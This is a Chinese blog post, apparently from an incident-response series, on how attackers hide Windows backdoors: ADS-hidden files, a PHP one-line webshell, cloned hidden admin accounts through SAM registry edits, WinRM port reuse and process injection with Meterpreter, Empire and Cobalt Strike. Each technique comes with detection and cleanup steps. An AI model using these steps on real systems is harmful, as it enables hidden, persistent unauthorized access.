权限维持篇---Windows权限维持--隐藏篇

最新推荐文章于 2024-05-06 13:17:02 发布
最新推荐文章于 2024-05-06 13:17:02 发布
阅读量1.1k 收藏 12
点赞数 1
分类专栏: 应急响应实战笔记 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45650712/article/details/116272342
版权

权限维持篇—Windows权限维持–隐藏篇

文章目录

前言

攻击者在获取服务器权限后,通常会用一些后门来维持权限,如果你想让你的后门保持的更久些,那么请隐藏好它,使之不易被管理员发现。

一、隐藏文件

1、利用文件属性最简单的一种隐藏文件的方式,文件右键属性,勾选隐藏,点击确定后,在这个文件里看不到刚刚的文件了。
在这里插入图片描述
如果要让文件显示出来,就点击查看,勾选显示隐藏的文件,文件就显示出来。
在这里插入图片描述
如何真正隐藏文件?
使用Attrib +s +a +h +r命令就是把原本的文件夹增加了系统文件属性、存档文件属性、只读文件属性和隐藏文件属性。
attrib +s +a +h +r D:\test\project\test .txt
这样就做到了真正的隐藏,不管你是否显示隐藏文件,此文件夹都看不见。
破解隐藏文件:
打开电脑文件夹选项卡,取消”隐藏受保护的操作系统文件“勾选,把”隐藏文件和文件夹“下面的单选选择“显示隐藏的文件、文件夹和驱动器”。
在这里插入图片描述
2、利用ADS隐藏文件内容
在服务器上echo一个数据流文件进去,比如index.php是网页正常文件,我们可以这样子搞:
echo ^<?php @eval($_POST[‘chopper’]);?^> > index.php:hidden.jpg
这样子就生成了一个不可见的shell hidden.jpg,常规的文件管理器、type命令,dir命令、del命令发现都找不出那个
hidden.jpg的。

问题1:如何查看index.php:hidden.jpg内容呢?
进入文件所在目录,notepad index.php:hidden.jpg 或者 dir /r
问题2:如何删除index.php:hidden.jpg?
直接删除index.php即可

3、驱动级文件隐藏驱动隐藏我们可以用过一些软件来实现,软件名字叫:Easy File Locker
下载链接: http://www.xoslab.com/efl.html
如果你在网站目录未查找到相关文件,且系统目录存在存在以下文件:

c:\WINDOWS\xlkfs.dat
c:\WINDOWS\xlkfs.dll
c:\WINDOWS\xlkfs.ini
c:\WINDOWS\system32\drivers\xlkfs.sys

那么你,应该是遭遇了驱动级文件隐藏。
如何清除?

1、查询服务状态: sc qc xlkfs
2、停止服务: net stop xlkfs 服务停止以后,经驱动级隐藏的文件即可显现
3、删除服务: sc delete xlkfs
4、删除系统目录下面的文件,重启系统,确认服务已经被清理了。

隐藏文件的方式还有很多,比如伪装成一个系统文件夹图标,利用畸形文件名、保留文件名无法删除,甚至取一个与系
统文件很像的文件名并放在正常目录里面,很难辨别出来。
这些隐藏文件的方式早已不再是秘密,而更多的恶意程序开始实现“无文件”攻击,这种方式极难被发现。

二、隐藏账号

window 隐藏系统用户操作,CMD命令行下,建立了一个用户名为“test$”,密码为“abc123!”的简单隐藏账户,并且把该隐藏账户提升为了管理员权限。
在这里插入图片描述

PS:CMD命令行使用"net user",看不到"test$"这个账号,但在控制面板和本地用户和组是可以显示此用户的。
克隆账号制作过程:
1、“开始”→“运行”,输入“regedt32.exe”后回车,需要到“HKEY_LOCAL_MACHINE\SAM\SAM”,单机右建权限,把名
叫:administrator的用户给予:完全控制以及读取的权限,在后面打勾就行,然后关闭注册表编辑器,再次打开即可。
在这里插入图片描述

2、来到注册表编辑器的“HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\Names”处,点击test$用户,
得到在右边显示的键值中的“类型”一项显示为0x3ec,找到箭头所指目录。
在这里插入图片描述
3、找到administrator所对应的的项为“000001F4”,将“000001F4”的F值复制到“000003EC”的F值中,保存。
在这里插入图片描述

4.4、分别test和“000003 EC”导出到桌面,删除test用户net user test$ /del

在这里插入图片描述
5、将刚才导出的两个后缀为.reg的注册表项导入注册表中。这样所谓的隐藏账户就创建好了。PS:不管你是在命令提
示符下输入net user 或者在系统用户管理界面都是看不到test$这个账户的,只有在注册表中才能看得到。
检测和清理方法:
使用D盾_web查杀工具,使用克隆账号检测功能进行查看,可检测出隐藏、克隆账号。
在这里插入图片描述

三、端口复用

通过端口复用来达到隐藏端口的目的,在Window下,如何实现端口复用呢?
前阵子,@Twi1ight公布了一种基于内置系统服务的端口复用后门方法,利用WinRM服务,一条命令实现端口复用后
门:
winrm set winrm/config/service @{EnableCompatibilityHttpListener=“true”}
一般开启WinRM服务作为远程管理,但还是第一次听到可以作为端口复用,一种简单容易实现的端口复用方式。假设,
攻击者已获取到administrator账号密码,连接远程WinRM服务执行命令:
在这里插入图片描述
当执行这条命令的同时,将在安全日志中留下痕迹,
在这里插入图片描述
另外,可以通过代码实现端口复用重定向,工具:https://github.com/crabkun/Switcher

四、进程注入

进程注入,一直是病毒木马的惯用手段,同时,它也是一种隐藏技术。在常见的渗透测试框架中,进程注入是怎么做的
以及我们如何通过工具排查出来?
1、meterpreter会话注入
当前权限无法获取hash值,查看目前系统进程

在这里插入图片描述
通过migrate将进程注入到system进程后,成功获得hash值。

在这里插入图片描述
Window后门排查:
通过TCPview显示已建立的TCP连接,我们可以看到异常的连接,同时,恶意软件将以绿色显示不到一秒钟,然后变成红色消失,如此循环。
在这里插入图片描述
2、Empire会话进程注入
通过psinject模块进行会话注入,直接输入ps选择一个SYSTEM权限的进程PID,使用进程注入模块,来获取权限。如下图:
在这里插入图片描述
Window后门排查:利用process monitor或者火绒剑监控进程都可以定位到注入进程。
在这里插入图片描述
在这里插入图片描述
3、Cobalt Strike进程注入
选择进程,点击inject,随后选择监听器,点击choose,即可发现Cobaltstrike弹回了目标机的一个新会话,这个会话就是成功注入到某进程的beacon。

在这里插入图片描述

在这里插入图片描述
Window后门排查:利用process monitor捕捉通信过程,有规律的请求取决于sleep设置的间隔。

在这里插入图片描述

五、结束

本文主要介绍了Window下的几种隐藏技术,包括隐藏文件、隐藏账号、端口复用、进程注入等方面的简单实现及其排
查技巧。仅作抛砖引玉之用,欢迎留言分享。

六、我的公众号

后续操作请持续关注哦!!!
了解更多请关注下列公众号:
😗 😗 😗 😗 😗 😗 😗 😗 😗 😗 😗 😗 😗 😗 😗😗😗😗😗😗😗😗😗
在这里插入图片描述
😗 😗 😗 😗 😗 😗 😗 😗 😗 😗 😗 😗 😗 😗 😗😗😗😗😗😗😗😗😗

永不垂头
关注
  • 1
    点赞
  • 12
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Windows常见的几种权限维持
hackzkaq的博客
05-24 1659
零基础学黑客,搜索公众号:白帽子左一 1.映像劫持技术 简介 “映像劫持”,也被称为“IFEO”(Image File Execution Options),在WindowsNT架构的系统里,IFEO的本意是为一些在默认系统环境中运行时可能引发错误的程序执行体提供特殊的环境设定。 当一个可执行程序位于IFEO的控制中时,它的内存分配则根据该程序的参数来设定,而WindowsN T架构的系统能通过这个注册表项使用与可执行程序文件名匹配的项目作为程序载入时的控制依据,最终得以设定一个程序的堆管理机制和一些辅助
Silentsoul04#vulnerability-paper-1#权限维持Windows 内核~ 驱动断链隐藏技术1
07-25
前言在做权限维持的时候,往往采用三环的技术显得可能微不足道了。本节用内核层的技术实现驱动信息隐藏。恶意驱动文件查找在普遍的红蓝对抗中,蓝队针对于底层的知识了解的
【神兵利器】后渗透-权限维持工具之HackerPermKeeper
youmaob的博客
04-03 670
通过渗透拿到权限之后,为了不让权限丢失,都会进行权限维持,而在进行权限维持的时候,红队需要花费大量的时候,来验证是否合适,因此在这款工具就诞生 HackerPermKeeper[黑客权限保持者]OpenSSH后门万能密码&记录密码(这个需要依赖环境),就是把对方的门换个锁,但是原来的钥匙也可以使用。|| 越少,越难发现,但是部署起来,需要的依赖很多。ssh软链接&crontab。crontab后计划任务。发现程度:||||||发现程度:||||||发现程度:||||||发现程度:||||||
SC实现隐藏Windows服务维持权限
XunanSec的博客
05-31 909
简介: sc.exe是Windows系统文件中自带的服务管理程序,可远程对服务进行操作;这里讲述了利用sc和Powershell程序来隐藏服务,搭到长期维持权限的效果。 创建服务 创建一个服务名为demo的自启动服务,服务运行地址指向木马路径,以tcpip协议传输并以本地系统权限运行 sc create demo start= auto binPath="cmd.exe /k C:\tu.exe" depend= Tcpip obj= Localsystem 添加个描述 sc descr
2024年最新Windows权限维持技术总结、复现_cs权限维持,网络安全开发技术总结
最新发布
2401_84264692的博客
05-06 826
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon的作用是指定用户登录时 Winlogon 运行的程序。默认情况下,Winlogon 运行 Userinit.exe(运行登录脚本),重新建立网络连接,然后启动 Windows 用户界面 Explorer.exe。可以更改此条目的值以添加或删除程序。
应急响应实战笔记——权限维持:⑦ 常见WebShell管理工具
君逍遥o
04-07 428
中国菜刀是一款专业的网站管理软件,用途广泛,使用方便,小巧实用。攻击者在入侵网站时,通常要通过各种方式写入Webshell,从而获得服务器的控制权限,比如执行系统命令、读取配置文件、窃取用户数据,篡改网站页面等操作。AntSword是一个开放源代码,跨平台的网站管理工具,旨在满足渗透测试人员以及具有权限和/或授权的安全研究人员以及网站管理员的需求。Weevely是一种Python编写的webshell管理工具,跨平台,只支持PHP。这是一款跨平台的基于配置文件的中国菜刀,把所有操作给予用户来定义。
内网渗透-windows权限维持的方法
lza20001103的博客
04-14 1140
内网渗透-windows权限维持的方法
权限维持_Windows内核_驱动断链隐藏技术1
08-03
1. 恶意驱动件查找 2. 驱动断链隐藏结构 3. 代码分析实现
红蓝对抗之Windows内网渗透-腾讯SRC出品1
08-03
9. **权限维持与免杀**: 攻击者会设法保持持久访问,可能使用隐藏进程、后门或滥用合法服务。免杀技术用于避免被检测,如使用混淆、加密通信和自定义编码。 这些方法揭示了内网渗透的常见步骤和工具,了解这些...
Window权限维持(四):快捷方式修改1
08-03
Windows快捷方式与权限维持Windows快捷方式,通常以.LNK文件扩展名存在,是操作系统中一种方便的机制,用于快速访问程序、文件文件夹。由于它们在用户日常操作中的广泛使用,快捷方式也成为了恶意软件实现...
红队技巧:隐藏windows服务1
08-03
隐藏Windows服务的这种方法对于红队行动非常有用,因为它允许在不引起怀疑的情况下维持权限。然而,它同时也提醒我们,保持系统安全不仅需要防止初始入侵,还必须警惕潜在的持久威胁。理解并应对这些隐藏服务的技巧...
Telemetry:WINDOWS TELEMETRY权限维持
03-18
遥测 背景 是Windows持久性的C# 今天,我们将讨论一种持久性方法,该方法利用了Microsoft过去十年在Windows版本中包含的一些出色的遥测技术。 本地管理员的安装权限(要求具有写入HKLM的能力) 有CompatTelRunner.exe 2008R2 / Windows 7至2019 / Windows 10 优势 使用系统自己的遥测计划任务 仅注册表可疑后门故障排除 命令行用法 ABUSING WINDOWS TELEMETRY FOR PERSISTENCE .Imanfeng Features: Install: - Deployment authority maintains backdoor Command:
网络安全-渗透中的权限维持-杨晓成-360
02-01
网络安全-渗透中的权限维持-杨晓成-360-下载版 权限维持 Windows相关 Linux相关 中间件 webshell
Windows最常用的权限维持技术
cike_y
06-13 658
权限维持能很好的躲避很多事情,也能让我们更加轻松的操作想做的事,但是免杀很重要,在了解权限维持技术的前提下,还要学会如何制作免杀,从而达到真正的绕过且维持
Window下常见的权限维持方式
12-02 4万+
在获取服务器权限后,通常会用一些后门技术来维持服务器权限,服务器一旦被植入后门,攻击者便如入无人之境。本文将对常见的window服务端自启动后门技术进行解析,知己知彼方能杜绝后门。 0x01 注册表自启动 通过修改注册表自启动键值,添加一个木马程序路径,实现开机自启动。 常用的注册表启动键: # Run键 HKEY_CURRENT_USER\Software\Microsoft\Win...
如果U盘中了文件隐藏病毒,怎么办?
热门推荐
GeekZW的博客
05-02 4万+
                      (转)如果U盘中了文件隐藏病毒,怎么办?   文章原地址:http://www.uqidong.com/help/1625.html或点击打开链接 一句话:将做好的病毒隐藏文件夹.cmd放到中毒的文件夹(U盘)中,双击即可!!! 如何制作病毒隐藏文件夹.cmd呢?           u盘是我们经常用来拷贝、存储文件的移动存储设备,如果使用...
为什么win7文件夹那里没显示工具栏了,例如,文件,编辑,查看,工具,帮助
冬无雪的博客
07-07 2607
没显示工具栏 本来应该是这样: 结果却变成这样了: 如果要显示: 1.点击组织, 2.弹出菜单选择点击布局, 3.点击选择菜单栏就可以显示了
windows权限维持
qq_46527080的博客
02-25 1157
windows权限维持一、添加影子账户二.nc自启动(需要一个nc程序)三、msf权限维持四、powshell权限维持 一、添加影子账户 1.首先常见一个影子账户(隐蔽的) net user chao1$ passwd /add 加入用户管理员组 net localgroup administrators chao1$ /add 2.打开注册表编辑器regedt32 打开HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users键值,然后找到admin对应的类型
Windows权限维持
duan_qiao925的博客
06-18 378
权限维持 当通过漏洞获取目标权限后,可能会被管理员发现或者漏洞被修复,导致我们获取的权限失效。因此,需要隐藏后门,上传木马,使目标主动连接远控主机。 Windows权限维持 隐藏系统用户 使用net命令创建用户 net 命令创建用户时,在用户名后添加"$",可以创建隐藏用户。这里的隐藏单纯的值net user不会显示,但是可以再控制面板查看到。 介绍几条命令 目标 操作 查看用户 net user 添加用户 net user 用户名 /add 改密码 net user 用户名 密码
kali linux权限维持,权限维持-NC后门
06-02
在Kali Linux中,权限维持是一个重要的主题,因为攻击者通常会尝试在被攻击的系统上维持其访问权限。其中一个方法是使用NC后门。 NC后门是一种基于Netcat的后门,它允许攻击者在被攻击系统上远程执行命令。以下是在...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值